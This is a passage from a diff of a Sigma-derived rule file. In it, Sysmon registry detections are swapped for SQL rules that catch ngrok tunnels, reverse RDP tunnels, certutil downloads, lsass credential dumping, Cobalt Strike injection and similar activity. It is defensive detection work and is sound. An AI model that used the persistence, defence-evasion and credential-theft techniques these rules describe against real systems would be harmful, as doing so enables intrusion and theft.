ESCAPE '\\' OR Details LIKE '%wscript%' ESCAPE '\\' OR Details LIKE 
'%.bat%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_app_paths.yml" + "filename": "net_connection_win_ngrok_tunnel.yml" }, { - "title": "Blackbyte Ransomware Registry", - "id": "83314318-052a-4c90-a1ad-660ece38d276", + "title": "RDP Over Reverse SSH Tunnel", + "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", "status": "test", - "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", - "author": "frack113", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject 
LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" ], - "filename": "registry_set_blackbyte_ransomware.yml" + "filename": "net_connection_win_rdp_reverse_tunnel.yml" }, { - "title": "Potential Persistence Via MyComputer Registry Keys", - "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", - "status": "experimental", - "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Program Location with Network Connections", + "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", + "status": "test", + "description": "Detects programs with network connections running in suspicious files system locations", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.persistence" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE 
'%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_mycomputer.yml" + "filename": "net_connection_win_susp_prog_location_network_connection.yml" }, { - "title": "Service Binary in Suspicious Folder", - "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", + "title": "Suspicious Network Connection Binary No CommandLine", + "id": "20384606-a124-4fec-acbb-8bd373728613", "status": "experimental", - "description": "Detect the creation of a service with a service binary located in a suspicious directory", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND Details IN ('DWORD 
(0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" ], - "filename": "registry_set_creation_service_susp_folder.yml" + "filename": "net_connection_win_susp_binary_no_cmdline.yml" }, { - "title": "Adwind RAT / JRAT - Registry", - "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", - "status": "experimental", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "title": "Remote PowerShell Session (Network)", + "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", + "status": "test", + "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" + ], + "falsepositives": [ + "Legitimate usage of remote PowerShell, e.g. 
remote administration and monitoring.", + "Network Service user name of a not-covered localization" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND Details LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" ], - "filename": "registry_set_mal_adwind.yml" + "filename": "net_connection_win_remote_powershell_session_network.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features - Registry", - "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", + "title": "Cmstp Making Network Connection", + "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", "status": "experimental", - "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". 
Which allows the user to install untrusted packages.", + "description": "Detects suspicious network connection by Cmstp", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" ], - "filename": "registry_set_turn_on_dev_features.yml" + "filename": "net_connection_win_susp_cmstp.yml" }, { - "title": "NET NGenAssemblyUsageLog Registry Key Tamper", - "id": "28036918-04d3-423d-91c0-55ecf99fb892", - "status": "experimental", - "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. 
fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", - "author": "frack113", + "title": "Potential Dead Drop Resolvers", + "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", + "status": "test", + "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", + "author": "Sorina Ionescu", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1102", + "attack.t1102.001" ], "falsepositives": [ - "Unknown" + "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Initiated = 'true' AND (DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR 
DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\opera.exe' ESCAPE '\\') OR (Image LIKE '%\\\\safari.exe' ESCAPE '\\') OR (Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (Image LIKE '%\\\\whale.exe' ESCAPE '\\'))) AND NOT (((Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR Image LIKE '%\\\\MsSense.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\') OR (Image LIKE '%\\\\Engine.exe' ESCAPE '\\')))" ], - "filename": 
"registry_set_net_cli_ngenassemblyusagelog.yml" + "filename": "net_connection_win_dead_drop_resolvers.yml" }, { - "title": "Potential Persistence Via CHM Helper DLL", - "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "title": "RDP to HTTP or HTTPS Target Ports", + "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", "status": "experimental", - "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" ], - "filename": "registry_set_persistence_chm.yml" + "filename": "net_connection_win_rdp_to_http.yml" }, { - "title": "Disable PUA Protection on Windows Defender", - "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", + "title": "Connection Initiated Via Certutil.EXE", + "id": "0dba975d-a193-4ed1-a067-424df57570d1", "status": "experimental", - "description": "Detects disabling Windows Defender PUA protection", - "author": "Austin Songer @austinsonger", + "description": "Detects a network connection initiated by the certutil.exe tool.\nAttackers can abuse 
the utility in order to download malware or additional payloads.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '135', '443', '445'))" ], - "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" + "filename": "net_connection_win_certutil_initiated_connection.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Sysmon Registry", - "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", - "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Epmap Connection", + "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "status": "experimental", + "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", + "author": "frack113, Tim Shelton (fps)", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.lateral_movement" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE 
'%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND Details IN ('0', 'DWORD (0x00000000)'))))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" ], - "filename": "registry_set_dot_net_etw_tamper.yml" + "filename": "net_connection_win_susp_epmap.yml" }, { - "title": "Potential Persistence Via GlobalFlags", - "id": "36803969-5421-41ec-b92f-8500f79c23b0", + "title": "CobaltStrike Process Injection", + "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", "status": "test", - "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", - "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", + "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", + "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.persistence", "attack.defense_evasion", - "attack.t1546.012", - "car.2013-01-002" + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE '%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_globalflags.yml" + "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" }, { - "title": "Potential Attachment Manager Settings Associations Tamper", - "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", + "title": "Remote Thread Creation Ttdinject.exe Proxy", + "id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND Details = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (Details LIKE '%.zip;%' ESCAPE '\\' OR Details LIKE '%.rar;%' ESCAPE '\\' OR Details LIKE '%.exe;%' ESCAPE '\\' OR Details LIKE '%.bat;%' ESCAPE '\\' OR Details LIKE '%.com;%' ESCAPE '\\' OR Details LIKE '%.cmd;%' ESCAPE '\\' OR Details LIKE '%.reg;%' ESCAPE '\\' OR Details LIKE '%.msi;%' ESCAPE '\\' OR Details LIKE '%.htm;%' ESCAPE '\\' OR Details LIKE '%.html;%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE 
'\\')" ], - "filename": "registry_set_policies_associations_tamper.yml" + "filename": "create_remote_thread_win_ttdinjec.yml" }, { - "title": "Hide Schedule Task Via Index Value Tamper", - "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", + "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", + "id": "fb656378-f909-47c1-8747-278bf09f4f4f", "status": "experimental", - "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" + "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", - "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "title": "Bumblebee Remote Thread Creation", + "id": 
"994cac2b-92c2-44bf-8853-14f6ca39fbda", "status": "experimental", - "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", + "description": "Detects remote thread injection events based on action seen used by bumblebee", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" + "filename": "create_remote_thread_win_bumblebee.yml" }, { - "title": "COM Hijack via Sdclt", - "id": "07743f65-7ec9-404a-a519-913db7118a8d", - "status": "test", - "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", - "author": "Omkar Gudhate", + "title": "Remote Thread Creation in Suspicious Targets", + "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", + "status": "experimental", + "description": "Detects a remote thread creation in suspicious target images", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1546", - "attack.t1548" + 
"attack.t1055.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "registry_set_comhijack_sdclt.yml" + "filename": "create_remote_thread_win_susp_targets.yml" }, { - "title": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", - "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", - 